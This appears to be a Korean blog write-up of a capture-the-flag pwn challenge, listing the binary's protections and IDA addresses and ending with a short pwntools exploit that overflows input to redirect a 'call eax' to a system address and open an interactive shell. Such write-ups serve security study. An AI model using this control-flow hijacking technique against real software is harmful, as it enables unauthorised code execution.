반응형
역시 사진 보호 때문에 사진을 올리지 못한다.
간단히 메모정도만
보호기법
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
파일 실행시
"Greetings from Santa! Wanna talk? " 문구에 입력하면
프로그램이 종료된다. 뭔가 이상한 느낌이 들었다.
IDA로 String을 찍었을 때
What is your name? 후 fgets로 입력받는 구문이 있다.
역으로 다시 살피면 Wassna talke 후 fgets로 입력 받은 후
쭉 내려가면 test eax, eax 이 있는데
이 구간을 잘 살펴봐주면 된다.
y(0x79) 를 가져오는데 입력 값 맨 앞에 y를 넣어주면 잘 넘어간다.
* IDA로 봤을 때 분석 포인트들 *
0x80486a0 = print "Greetings from Santa! Wanna talk? "
0x80486bf = fgets after Greetings
0x8048711 = print What is your name?
0x8048728 = fgets after What is your
공격 포인트
fgets 입력 후 call eax 부분이 있는데 이 부분을 잘 보면 입력 값이랑
잘 비교해보면 우리가 입력한 값이 EAX레지스터에 들어가 있는 것을 볼 수 있다.
r = process("./chall")
print r.recvuntil("Greetings from Santa! Wanna talk? ")
system_addr = 0x8048898
msg = "y"
msg += "A"*63
msg += p32(system_addr)
r.send(msg+'\n')
print r.recv(2014)
r.interactive()
반응형
'[ ★ ]Study > CTF' 카테고리의 다른 글
| CTF remote environment(socat) (0) | 2019.12.04 |
|---|---|
| Pwntools 설치(install) (0) | 2019.04.03 |
| TUCTF2018 Shella_Easy(pwn) (0) | 2018.12.15 |
| TUCTF2018 - ehh (0) | 2018.12.15 |
| P.W.N CTF ImportantService(pwn) (0) | 2018.12.01 |
댓글